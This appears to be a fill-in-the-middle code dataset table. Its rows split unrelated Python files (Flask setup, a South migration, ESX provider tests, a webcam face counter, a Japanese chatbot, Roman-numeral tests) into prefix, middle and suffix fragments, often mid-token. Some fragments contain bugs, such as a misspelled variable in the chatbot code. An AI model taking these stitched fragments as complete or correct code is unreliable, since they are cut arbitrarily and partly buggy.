prefix stringlengths 0 918k | middle stringlengths 0 812k | suffix stringlengths 0 962k |
|---|---|---|
# -*- coding: utf-8 -*- |
# ===========================================================================
#
# Copyright (C) 2014 Samuel Masuy. All rights reserved.
# samuel.masuy@gmail.com
#
# ===========================================================================
from flask import Flask
# Declare app object
app = Flask(__name__)
# Tell Flask where the config file is (module path 'config').
app.config.from_object('config')
# NOTE(review): debug mode exposes the interactive debugger — presumably a
# development-only setting; confirm it is disabled for deployment.
app.debug = True
# Imported at the bottom on purpose: app/views.py imports `app` from this
# module, so importing it earlier would cause a circular import.
from app import views
|
""" $lic$
Copyright (C) 2016-2020 by Tsinghua University and The Board of Trustees of
Stanford University
This program is free software: you can redistribute it and/or modify it under
the terms of the Modified BSD-3 License as published by the Open Source
Initiative.
This program is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE. See the BSD-3 License for more details.
You should have received a copy of the Modified BSD-3 License along with this
program. If not, see <https://opensource.org/licenses/BSD-3-Clause>.
"""
'''
Enum for loop types.
'''
# Integer identifiers for the nested-loop dimensions; NUM is the count of
# loop types. Presumably IFM/OFM = input/output feature maps and BAT = batch,
# consistent with the NN-dataflow naming — confirm against call sites.
IFM = 0
OFM = 1
BAT = 2
NUM = 3
|
from south.db import db
from django.db import models
from askmeanything.models import *
class Migration:
    """South schema migration for the askmeanything app.

    The forwards/backwards hooks are intentionally empty; the frozen ORM
    definitions below are what South uses to reconstruct the `orm` object.
    Two lines were repaired where extraction garbling split tokens
    ('max_length' and 'django_content_type').
    """

    def forwards(self, orm):
        "Write your forwards migration here"

    def backwards(self, orm):
        "Write your backwards migration here"

    # Frozen model definitions: {app.model: {field: (field class, args, kwargs)}}
    models = {
        'askmeanything.poll': {
            'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'polls'", 'to': "orm['auth.User']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'open': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
            'question': ('django.db.models.fields.CharField', [], {'max_length': '200'})
        },
        'askmeanything.response': {
            'answer': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'poll': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'responses'", 'to': "orm['askmeanything.Poll']"}),
            'votes': ('django.db.models.fields.IntegerField', [], {'default': '0'})
        },
        'auth.group': {
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'unique_together': "(('content_type', 'codename'),)"},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'contenttypes.contenttype': {
            'Meta': {'unique_together': "(('app_label', 'model'),)", 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        }
    }

    complete_apps = ['askmeanything']
|
# -*- coding: utf-8 -*-
""" Tests of managing ESX hypervisors directly. If another direct ones will be supported, it should
not be difficult to extend the parametrizer.
"""
import pytest
import random
from cfme.infrastructure.provider import VMwareProvider
from utils.conf import cfme_data, credentials
from utils.net import resolve_hostname
from utils.providers import get_crud
from utils.version import Version
from utils.wait import wait_for
def pytest_generate_tests(metafunc):
    """Parametrize tests with a direct-ESX provider.

    For every virtualcenter entry in cfme_data that declares hosts and a
    version >= 5.0, pick one host at random and build a VMwareProvider that
    points straight at that host.
    """
    argnames = "provider", "provider_data", "original_provider_key"
    argvalues = []
    idlist = []
    for provider_key, provider_cfg in cfme_data.get("management_systems", {}).iteritems():
        if provider_cfg["type"] != "virtualcenter":
            continue
        esx_hosts = provider_cfg.get("hosts", [])
        if not esx_hosts:
            continue
        vc_version = provider_cfg.get("version", None)
        if vc_version is None:
            # No version, no test
            continue
        if Version(vc_version) < "5.0":
            # Ignore lesser than 5
            continue
        esx_host = random.choice(esx_hosts)
        host_creds = credentials[esx_host["credentials"]]
        host_ip = resolve_hostname(esx_host["name"])
        credential = VMwareProvider.Credential(
            principal=host_creds["username"],
            secret=host_creds["password"],
            verify_secret=host_creds["password"]
        )
        # Mock provider data: clone the vCenter entry, then retarget it at
        # the single chosen host.
        mocked_data = dict(provider_cfg)
        mocked_data["name"] = esx_host["name"]
        mocked_data["hostname"] = esx_host["name"]
        mocked_data["ipaddress"] = host_ip
        mocked_data["credentials"] = esx_host["credentials"]
        mocked_data.pop("host_provisioning", None)
        mocked_data["hosts"] = [esx_host]
        mocked_data["discovery_range"] = {"start": host_ip, "end": host_ip}
        esx_provider = VMwareProvider(
            name=esx_host["name"],
            hostname=esx_host["name"],
            ip_address=host_ip,
            credentials={'default': credential},
            provider_data=mocked_data,
        )
        argvalues.append([esx_provider, mocked_data, provider_key])
        idlist.append("{}/random_host".format(provider_key))
    metafunc.parametrize(argnames, argvalues, ids=idlist, scope="module")
@pytest.yield_fixture(scope="module")
def setup_provider(provider, original_provider_key):
    """Swap the original vCenter provider for the direct ESX host provider.

    Deletes the original provider (and its hosts) first, adds the host-backed
    provider, waits until it manages some inventory, then tears everything
    down on exit.
    """
    original_provider = get_crud(original_provider_key)
    if original_provider.exists:
        # Delete original provider's hosts first
        for host in original_provider.hosts:
            if host.exists:
                host.delete(cancel=False)
        # Get rid of the original provider, it would make a mess.
        original_provider.delete(cancel=False)
        # NOTE(review): source was garbled here; the only deletion in flight
        # is the original provider's, so wait on that — confirm vs. history.
        original_provider.wait_for_delete()
    provider.create()
    provider.refresh_provider_relationships()
    try:
        # Consider setup successful once the provider reports any inventory.
        wait_for(
            lambda: any([
                provider.num_vm() > 0,
                provider.num_template() > 0,
                provider.num_datastore() > 0,
                provider.num_host() > 0,
            ]), num_sec=400, delay=5)
    except:
        # Remove the half-added provider, then surface the original error.
        provider.delete(cancel=False)
        raise
    yield
    # Teardown: remove the host provider and its hosts completely.
    for host in provider.hosts:
        if host.exists:
            host.delete(cancel=False)
    provider.delete(cancel=False)
    provider.wait_for_delete()
def test_validate(provider, setup_provider, provider_data):
    """Since the provider (host) gets added in the fixture, nothing special has to happen here."""
    # db=False: validate against the UI stats only, skipping DB comparison.
    provider.validate(db=False)
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2008, TUBITAK/UEKAE
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
#
# Please read the COPYING file.
#
import os

import pisilinux.context as ctx
import pisilinux.db.lazydb as lazydb
import pisilinux.history
import pisilinux.util
class HistoryDB(lazydb.LazyDB):
    """Lazily-loaded view over the pisilinux operation history directory.

    History entries are XML files named ``NNN_<type>.xml`` where ``NNN`` is
    the zero-padded operation number; ``self.__logs`` holds the file names
    newest-first.
    """

    def init(self):
        # LazyDB hook: build the log index and a fresh History accumulator.
        self.__logs = self.__generate_history()
        self.history = pisilinux.history.History()

    def __generate_history(self):
        """Return history XML file names sorted newest-first."""
        logs = [x for x in os.listdir(ctx.config.history_dir()) if x.endswith(".xml")]
        # Sort by the numeric operation prefix. The original cmp-style call
        # (sort(lambda x, y: ...)) is a TypeError on Python 3; the key form
        # is equivalent on both Python 2 and 3.
        logs.sort(key=lambda x: int(x.split("_")[0]))
        logs.reverse()
        return logs

    def create_history(self, operation):
        """Start a new in-memory history record of the given operation type."""
        self.history.create(operation)

    def add_and_update(self, pkgBefore=None, pkgAfter=None, operation=None, otype=None):
        """Record a package transition and flush the history to disk."""
        self.add_package(pkgBefore, pkgAfter, operation, otype)
        self.update_history()

    def add_package(self, pkgBefore=None, pkgAfter=None, operation=None, otype=None):
        """Record a package transition in the in-memory history."""
        self.history.add(pkgBefore, pkgAfter, operation, otype)

    def load_config(self, operation, package):
        """Restore a package's saved config files from history onto '/'."""
        config_dir = os.path.join(ctx.config.history_dir(), "%03d" % operation, package)
        if os.path.exists(config_dir):
            import distutils.dir_util as dir_util
            dir_util.copy_tree(config_dir, "/")

    def save_config(self, package, config_file):
        """Snapshot one config file (or directory) into the current operation."""
        # NOTE(review): operation.no looks numeric elsewhere in this class;
        # os.path.join requires strings — confirm the caller passes a str here.
        hist_dir = os.path.join(ctx.config.history_dir(), self.history.operation.no, package)
        if os.path.isdir(config_file):
            os.makedirs(os.path.join(hist_dir, config_file))
            return
        # Strip the leading '/' so the absolute path nests under hist_dir.
        destdir = os.path.join(hist_dir, config_file[1:])
        pisilinux.util.copy_file_stat(config_file, destdir)

    def update_repo(self, repo, uri, operation=None):
        """Record a repository update and flush the history to disk."""
        self.history.update_repo(repo, uri, operation)
        self.update_history()

    def update_history(self):
        """Flush the in-memory history record to disk."""
        self.history.update()

    def get_operation(self, operation):
        """Return the Operation with the given number, or None."""
        for log in self.__logs:
            if log.startswith("%03d_" % operation):
                hist = pisilinux.history.History(os.path.join(ctx.config.history_dir(), log))
                hist.operation.no = int(log.split("_")[0])
                return hist.operation
        return None

    def get_package_config_files(self, operation, package):
        """Return the config file paths saved for a package, or None."""
        package_path = os.path.join(ctx.config.history_dir(), "%03d/%s" % (operation, package))
        if not os.path.exists(package_path):
            return None
        configs = []
        for root, dirs, files in os.walk(package_path):
            for f in files:
                configs.append("%s/%s" % (root, f))
        return configs

    def get_config_files(self, operation):
        """Return {package: [config paths]} saved for an operation, or None."""
        config_path = os.path.join(ctx.config.history_dir(), "%03d" % operation)
        if not os.path.exists(config_path):
            return None
        allconfigs = {}
        packages = os.listdir(config_path)
        for package in packages:
            allconfigs[package] = self.get_package_config_files(operation, package)
        return allconfigs

    def get_till_operation(self, operation):
        """Yield operations newer than the given one (exclusive), newest-first."""
        # Nothing to yield if the boundary operation does not exist at all.
        if not [x for x in self.__logs if x.startswith("%03d_" % operation)]:
            return
        for log in self.__logs:
            if log.startswith("%03d_" % operation):
                return
            hist = pisilinux.history.History(os.path.join(ctx.config.history_dir(), log))
            hist.operation.no = int(log.split("_")[0])
            yield hist.operation

    def get_last(self, count=0):
        """Yield the newest *count* operations (all of them when count=0)."""
        count = count or len(self.__logs)
        for log in self.__logs[:count]:
            hist = pisilinux.history.History(os.path.join(ctx.config.history_dir(), log))
            hist.operation.no = int(log.split("_")[0])
            yield hist.operation

    def get_last_repo_update(self, last=1):
        """Return the date of the *last*-th most recent repo update, or None."""
        repoupdates = [l for l in self.__logs if l.endswith("repoupdate.xml")]
        repoupdates.reverse()
        # Require at least two repo updates before reporting one.
        if not len(repoupdates) >= 2:
            return None
        if last != 1 and len(repoupdates) <= last:
            return None
        hist = pisilinux.history.History(os.path.join(ctx.config.history_dir(), repoupdates[-last]))
        return hist.operation.date
|
from chainer import cuda
from chainer.functions.math import identity
from chainer import link
class Parameter(link.Link):
    """Link that just holds a parameter and returns it.

    .. deprecated:: v1.5
       The parameters are stored as variables as of v1.5. Use them directly
       instead.

    Args:
        array: Initial parameter array.

    Attributes:
        W (~chainer.Variable): Parameter variable.
    """

    def __init__(self, array):
        super(Parameter, self).__init__()
        self.add_param('W', array.shape, dtype=array.dtype)
        self.W.data = array
        # Move the link to the device the array already lives on.
        if isinstance(array, cuda.ndarray):
            self.to_gpu(cuda.get_device_from_array(array))

    def __call__(self, volatile='off'):
        """Returns the parameter variable.

        Args:
            volatile (~chainer.Flag): The volatility of the returned variable.

        Returns:
            ~chainer.Variable: A copy of the parameter variable with given
            volatility.
        """
        # The first identity creates a copy of W, and the second identity cuts
        # the edge if volatility is ON.
        # (Repaired extraction garbling that split `self.W` across columns.)
        W = identity.identity(self.W)
        W.volatile = volatile
        return identity.identity(W)
|
#!/usr/bin/env python
"""Basic example
Demonstrates how to create symbols and print some algebra operations.
"""
from sympy import Symbol, pprint
def main():
    """Build the symbolic expression (a*b*b + 2*b*a*b)**c and pretty-print it.

    Repaired an extraction artifact that garbled the first print('') call.
    """
    a = Symbol('a')
    b = Symbol('b')
    c = Symbol('c')
    e = (a*b*b + 2*b*a*b)**c
    print('')
    pprint(e)
    print('')
if __name__ == "__main__":
main()
|
import cv2
import numpy as np
import datetime as dt
# constant
# constant
faceCascade = cv2.CascadeClassifier('haarcascade_frontalface_alt.xml')
# Histogram-comparison method name -> OpenCV enum value.
OPENCV_METHODS = {
    "Correlation": 0,
    "Chi-Squared": 1,
    "Intersection": 2,
    "Hellinger": 3}
hist_limit = 0.6   # correlation above this means "same face as a remembered one"
ttl = 1 * 60       # seconds a face histogram stays in short-term memory
q_limit = 3        # consecutive identical frame counts required to accept a reading
# init variables
total_count = 0    # running total of distinct faces seen
prev_count = 0     # face count of the previously accepted frame
total_delta = 0    # new faces discovered in the current frame
stm = {}           # short-term memory: capture timestamp -> face histogram
q = []             # queue of recent per-frame face counts (fluctuation filter)
term_crit = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 1)
video_capture = cv2.VideoCapture(0)
while True:
    # Expire short-term-memory entries older than ttl.
    for t in list(stm):  # short term memory
        if (dt.datetime.now() - t).seconds > ttl:
            stm.pop(t, None)
    # Capture frame-by-frame
    ret, frame = video_capture.read()
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    faces = faceCascade.detectMultiScale(
        gray,
        scaleFactor=1.2,
        minNeighbors=5,
        minSize=(30, 30),
        flags=cv2.CASCADE_SCALE_IMAGE
    )
    count = len(faces)
    # Keep only the last q_limit counts and require them all to agree.
    if len(q) >= q_limit: del q[0]
    q.append(count)
    isSame = True
    for c in q:  # Protect from fluctuation
        if c != count: isSame = False
    if isSame is False: continue
    max_hist = 0
    total_delta = 0
    for (x, y, w, h) in faces:
        # Draw a rectangle around the faces
        cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)
        if count == prev_count: continue
        # set up the ROI
        face = frame[y: y + h, x: x + w]
        # NOTE(review): hsv_roi is computed but never used — the mask and
        # histogram below operate on the BGR crop. Presumably they were
        # meant to use hsv_roi (the standard mean-shift recipe); left
        # untouched to preserve behavior.
        hsv_roi = cv2.cvtColor(face, cv2.COLOR_BGR2HSV)
        mask = cv2.inRange(face, np.array((0., 60., 32.)), np.array((180., 255., 255.)))
        face_hist = cv2.calcHist([face], [0], mask, [180], [0, 180])
        cv2.normalize(face_hist, face_hist, 0, 255, cv2.NORM_MINMAX)
        # A face is "new" when it correlates with no remembered histogram.
        isFound = False
        for t in stm:
            hist_compare = cv2.compareHist(stm[t], face_hist, OPENCV_METHODS["Correlation"])
            if hist_compare > max_hist: max_hist = hist_compare
            if hist_compare >= hist_limit: isFound = True
        if (len(stm) == 0) or (isFound is False and max_hist > 0):
            total_delta += 1
        stm[dt.datetime.now()] = face_hist
    if prev_count != count:
        total_count += total_delta
        print("", count, " > ", total_count)
        prev_count = count
    # Display the resulting frame
    cv2.imshow('Video', frame)
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break
# When everything is done, release the capture
video_capture.release()
cv2.destroyAllWindows()
|
']
ans_title = result['title']
ans_when_time = result['when_time']
ans_where = result['where']
print('[' + str(count) + ']')
rfs(ans_what + "'" + ans_title + "'" + 'があります。' + '(' + ans_when_time + ')')
rfs('開催場所:' + ans_where)
elif category_ans == 'when':
#print('category is when')
result = result['data']
ans_title = result['title']
ans_when_day = result['when_day']
ans_when_time = result['when_time']
ans_where = result['where']
print('[' + str(count) + ']')
rfs('title:' + str(ans_title))
rfs(str(ans_when_day) + '日の' + str(ans_when_time) + '開始です。')
rfs('開催場所:' + ans_where)
elif category_ans == 'who':
#print('category is who')
result = result['data']
ans_title = result['title']
ans_name = result['who']
ans_when_time = result['when_time']
print('[' + str(count) + ']')
rfs('title:' + str(ans_title))
rfs(ans_name + 'さん。')
elif category_ans == 'where':
#print('category is where')
result = result['data']
ans_title = result['title']
ans_where = result['where']
ans_when_time = result['when_time']
print('[' + str(count) + ']')
rfs('title:' + str(ans_title))
rfs(ans_where + 'で行われます。')
elif category_ans == 'how_time':
#print('category is how_time')
result = result['data']
ans_title = result['title']
ans_how_time = result['how_time']
print('[' + str(count) + ']')
rfs(ans_title + ':' + ans_how_time + '時間')
else:
print('category is why or how')
rfs('スタッフへ引き継ぎます。')
#終了
record.record_A('----- conversation end -----',header = None)
#履歴の表示
df = pandas.read_csv('conversation_log.csv')
print_record = df[count_row_start:]
print(print_record)
sys.exit()
#解答番号をカウントアップ
count += 1
print('----------')
#情報検索部(k3)にアクセスしてDBを検索する
#該当するタプルはリスト化して返される
def look_k3(data):
    # Query the k3 information-retrieval backend with the given parameters;
    # matching tuples come back as a list.
    k3.set_params(data)
    return k3.search()
#ユーザーに欲しい情報があるか否かを質問して、
#ない場合は、もう一度初めからやり直す
#yes_or_no_one:一意の返答の場合
def yes_or_no_one(result, count_row_start):
    """Confirm a single answer with the user.

    Shows the answer's detail image when one is attached, then asks whether
    this was the wanted information: 'yes' drills into follow-up questions,
    'no' dumps the conversation log for staff handover and exits.
    """
    # Show the detail image when one is attached to the answer.
    if result['image'] != None:
        rfs('>詳細を表示します')
        im = Image.open(result['image'])
        im.show()
    rfs('>欲しい情報でしたか?(yes/no)')
    u_ans = input('Input: ')
    rfu(u_ans)
    if u_ans == 'yes':
        result_more = result
        ans_main_t3.more_question(result_more)
    elif u_ans == 'no':
        rfs('>スタッフへ引き継ぐために履歴を表示します。')
        record.record_A('----- conversation end -----')
        # Show the conversation history for the staff handover.
        df = pandas.read_csv('conversation_log.csv',header = None)
        print_record = df[count_row_start:]
        print(print_record)
        sys.exit()
#ユーザーに欲しい情報があるか否かを質問して、
#ない場合は、もう一度初めからやり直す
#yes_or_no_one:複数の返答の場合
def yes_or_no_some(results, list_num, count_row_start):
    """Confirm a multi-answer result set with the user.

    'yes' -> ask which answer number was wanted and drill down;
    'no'  -> dump the conversation log for staff handover and exit;
    anything else -> ask again.
    """
    rfs('>欲しい情報はありましたか?(yes/no)')
    u_ans = input('Input: ')
    rfu(u_ans)
    if u_ans == 'yes':
        # Capture the number of the answer the user wanted.
        rfs('>良かったです!何番の回答でしたか?')
        ans_num = input('Input: ')
        # Error handling for an out-of-range number: re-prompt until valid.
        if list_num < int(ans_num):
            ans_num = ans_main_t3.what_num(list_num)
        # Fetch the chosen answer and move on to follow-up questions.
        result_more = results[int(ans_num)]['data']
        ans_main_t3.more_question(result_more)
    elif u_ans == 'no':
        rfs('>スタッフへ引き継ぐために履歴を表示します。')
        record.record_A('----- conversation end -----')
        # Show the conversation history for the staff handover.
        df = pandas.read_csv('conversation_log.csv', header = None)
        print_record = df[count_row_start:]
        print(print_record)
        sys.exit()
    else:
        # Neither yes nor no: ask the whole question again.
        ans_main_t3.yes_or_no_some(results,list_num,count_row_start)
    '''
    rfs('>もう一度初めから開始しますか?(yes/no)')
    # 入力
    u_ans = input('Input: ')
    rfu(u_ans)
    if u_ans == 'yes':
        main_t3.start()
    else:
        record.record_A('----- conversation end -----')
        sys.exit()
    '''
#正しい番号が入力されるまで無限ループ
def what_num(ans_num):
    """Keep prompting until the user enters a number in [0, ans_num]; return it.

    NOTE(review): a non-numeric input still raises ValueError at int() —
    presumably acceptable for this prototype; confirm with the owners.
    """
    rfs('>正しい番号を入力してください。(0 ~ ' + str(ans_num) + ')')
    num = input('Input: ')
    if ans_num >= int(num):
        return num
    # Bug fix: the recursive retry's result was dropped (the function fell
    # through and implicitly returned None); propagate it to the caller.
    return ans_main_t3.what_num(ans_num)
#yes or noが入力されるまで無限ループ
def more_(text):
    """Ask *text* until the user answers 'yes' or 'no'; return the answer."""
    rfs(">" + text + '(yes/no)')
    ans = input('Input: ')
    # Bug fix: the original compared against the literal string 'yes|no',
    # which no input ever equals, so the check always failed. Accept either
    # of the two valid answers.
    if ans in ('yes', 'no'):
        return ans
    # Bug fix: the retry called a nonexistent ans_main_t3.y_or_n() and
    # dropped its result; recurse into this function and return the answer.
    return ans_main_t3.more_(text)
#ユーザーの深追い質問に対応する
def more_question(result_more):
    """Handle follow-up questions about a single chosen answer.

    Shows the attached detail image (if any), asks whether the user has a
    further question, classifies that question with the NLC categorizer, and
    answers from the fields of *result_more*.
    """
    # Show the detail image when one is attached.
    if result_more['image'] != None:
        rfs('詳細を表示します')
        im = Image.open(result_more['image'])
        im.show()
    rfs('>これについて、何か質問はありますか?(yes/no)')
    u_ans2 = input('Input: ')
    rfu(u_ans2)
    if u_ans2 =='no':
        rfs('>また、質問してくださいね!Have a nice day!')
        record.record_A('----- conversation end -----')
        sys.exit()
    elif u_ans2 == 'yes':
        rfs('>質問は何でしょうか?')
        # Read the follow-up question.
        st = input('Input: ')
        rfu(st)
        # Classify the question category (what/who/where/when/how_time).
        category_ans = get_nlc.nlc_0(st)
        more_category ='カテゴリー: '
        print( more_category + category_ans)
        if category_ans == 'what':
            rfs('>title:' + result_more['title'])
        elif category_ans == 'who':
            rfs(">" + result_more['who'] + 'さんです。')
        elif category_ans == 'where':
            rfs(">" + result_more['where'] + 'です。')
        elif category_ans == 'how_time' :
            rfs(">" + result_more['how_time'] + 'です。')
        elif category_ans == 'when':
            rfs(">" + result_more['when_day']+'日の'+result_more['when_time']+'です。')
        rfs('>もう一度初めから開始しますか?(yes/no)')
        # Ask whether to restart the whole conversation.
        u_ans = input('Input: ')
        rfu(u_ans)
        if u_ans == 'yes':
            main_t3.start()
        else:
            rfs('>また、質問してくださいね!Have a nice day!')
            record.record_A('----- conversation end -----')
            sys.exit()
    # Error handling when something other than yes/no was entered: re-ask.
    else:
        rfs('>yesかnoを入力してください')
        ans_main_t3.more_question(result_more)
#自信値が1以上のテーブルの数をカウントする
def count_list(results):
    """Length of the leading run of results whose 'reliability' is >= 1."""
    prefix_len = 0
    for entry in results:
        if entry['reliability'] < 1:
            break
        prefix_len += 1
    return prefix_len
#回答候補の中の条件全検索のテーブル数をカウントする
def count_list_condition(results):
    """Length of the leading run of results whose 'all_and' flag is nonzero."""
    prefix_len = 0
    for entry in results:
        if entry['all_and'] == 0:
            break
        prefix_len += 1
    return prefix_len
#情報検索部(k3)から返されたタプルの数によってそれぞれの返答をする。
#回答候補が5個以上の場合、追加質問を行う。
def anser(data,category_ans,add_q_count,results,count_row_start):
#信頼度1以上の回答候補をカウントする
ans_count = ans_main_t3.count_list(results)
#k3システムから返されたリストの数を数える
res_count = len(results)
#追加質問を2度行った時
if int(add_q_count) >= 2:
#条件の全検索で見つかった場合
if res_co | unt > 0 and results[0]['all_and'] == 1:
ans_count_condition = ans_main_t3.count_list_condition(results)
#条件全検索リストが1つの時
if ans_count_condition == 1:
rfs('>条件の全検索で当てはまるものが一件見つかりました。' | )
ans_main_t3.one_ans(category_ans,results)
ans_main_t3.yes_or_no_one(results[0]['data'],count_row_start)
#条件全検索リストが2つ~8つの時
elif ans_count_condition <= 8:
rfs('>条件の全検索で当てはまるものが複数見つかりました。')
ans_main_t3.some_ans_all(category_ans,results,count_row_start)
ans_main_t3.yes_or_no_some(results,ans_conut_condition,count_row_start)
#条件全検索リストが5つ以上の時
elif ans_count_condition > 8:
rfs('>追加質問の内容を加味して再検索しましたが、候補となる結果が絞りきれませんでした。')
rfs('>スタッフにひきつぐために履歴表示をします。')
#終了
record.record_A('----- conversation end -----')
#履歴の表示
df = pandas.read_csv('conversation_log.csv',header = None)
print_record = df[count_row_start:]
print(print_record)
sys.exit()
#条件の部分検索で見つかった場合
elif res_count == 0 or results[0]['all_and'] == 0:
if int(ans_count) == 0:
rfs('>追加質問の内容を加味して再検索しましたが、結果が見つかりませんでした。')
rfs('>スタッフに引き継ぐために履歴表示をします。')
#終了
record.record_A('----- conversation end -----')
df = pandas.read_csv('conversation_log.csv',header = None)
print_record = df[count_row_start:]
print(print_record)
sys.exit()
elif int(ans_count) == 1:
rfs('>条件の部分検索で当てはまりました。')
rfs('>代わりに似たものを表示させます。')
ans_main_t3.one_ans(category_ans,results,count_row_start)
ans_main_t3.yes_or_no_one(results[0]['data'],count_row_start)
#候補の数が8個以内の時
elif int(ans_count) <= 8:
rfs('>条件の部分検索では当てはまりました。')
rfs('>代わりに似たものを表示させます。')
ans_main_t3.some_ans(category_ans,results,ans_count,count_row_start)
ans_main_t3.yes_or_no_some(results,ans_count,count_row_start)
#候補の数が8個以上の時
elif int(ans_count) > 8:
rfs('>追加質問の内容を加味して再検索しましたが、候補となる結果が絞りきれませんでした。')
rfs('>スタッフにひきつぐために履歴表示をします。')
#終了
record.record_A('----- conversation end -----')
#履歴の表示
df = pandas.read_csv('conversation_log.csv',header = None)
print_record = df[count_row_start:]
print(print_record)
sys.exit()
#追加質問をまだ行っていない時
else:
#条件の全検索(AND)で見つかった時の返答
if res_count > 0 and results[0]['all_and'] == 1:
ans_count_condition = |
""" Test that import errors are detected. """
# pylint: disable=invalid-name, unused-import, no-absolute-import
import totally_missing # [import-error]
try:
    import maybe_missing
except ImportError:
    maybe_missing = None
try:
    import maybe_missing_1
except (ImportError, SyntaxError):
    maybe_missing_1 = None
try:
    import maybe_missing_2 # [import-error]
except ValueError:
    maybe_missing_2 = None
|
"""
Copyright (C) 2016 Quinn D Granfor <spootdev@gmail.com>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
version 2, as published by the Free Software Foundation.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License version 2 for more details.
You should have received a copy of the GNU General Public License
version 2 along with this program; if not, write to the Free
Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
MA 02110-1301, USA.
"""
from bs4 import BeautifulSoup
from common import common_logging_elasticsearch_httpx
from . import common_network
from . import common_string
# http://www.tv-intros.com
def com_tvintro_download(media_name):
    """
    Try to grab intro from tvintro
    """
    # TODO doesn't match the tvintro........base from theme
    # Build the show page URL, then look for the download anchor on it.
    page_url = ('http://www.tv-intros.com/' + media_name[0].upper() + '/'
                + common_string.com_string_title(media_name).replace(' ', '_')
                + ".html")
    download_link = BeautifulSoup(
        common_network.mk_network_fetch_from_url(page_url, None)).find(
            id="download_song")
    if download_link is None:
        return False  # no match
    common_logging_elasticsearch_httpx.com_es_httpx_post(
        message_type='info', message_text={'href': download_link['href']})
    common_network.mk_network_fetch_from_url(
        'http://www.tv-intros.com' + download_link['href'], 'theme.mp3')
    return True  # success
| |
import unittest
import sys
sys.path.append('./')
solutions = __import__('solutions.012_integer_to_roman', fromlist='*')
class Test012(unittest.TestCase):
    """Tests for solutions/012_integer_to_roman (Solution.intToRoman)."""

    def test_intToRoman(self):
        s = solutions.Solution()
        # Basic digits and subtractive forms.
        self.assertEqual(s.intToRoman(1), "I")
        self.assertEqual(s.intToRoman(2), "II")
        self.assertEqual(s.intToRoman(3), "III")
        self.assertEqual(s.intToRoman(4), "IV")
        self.assertEqual(s.intToRoman(5), "V")
        self.assertEqual(s.intToRoman(6), "VI")
        self.assertEqual(s.intToRoman(7), "VII")
        self.assertEqual(s.intToRoman(8), "VIII")
        self.assertEqual(s.intToRoman(9), "IX")
        self.assertEqual(s.intToRoman(10), "X")
        # Tens, hundreds, thousands and mixed values.
        self.assertEqual(s.intToRoman(28), "XXVIII")
        self.assertEqual(s.intToRoman(29), "XXIX")
        self.assertEqual(s.intToRoman(40), "XL")
        self.assertEqual(s.intToRoman(41), "XLI")
        self.assertEqual(s.intToRoman(89), "LXXXIX")
        self.assertEqual(s.intToRoman(98), "XCVIII")
        self.assertEqual(s.intToRoman(99), "XCIX")
        self.assertEqual(s.intToRoman(316), "CCCXVI")
        self.assertEqual(s.intToRoman(400), "CD")
        self.assertEqual(s.intToRoman(499), "CDXCIX")
        self.assertEqual(s.intToRoman(894), "DCCCXCIV")
        self.assertEqual(s.intToRoman(1499), "MCDXCIX")
        self.assertEqual(s.intToRoman(3999), "MMMCMXCIX")
        # Smoke-test the whole supported range for crashes.
        # (range instead of xrange, so the test also runs on Python 3;
        # behavior is identical on Python 2 for this loop.)
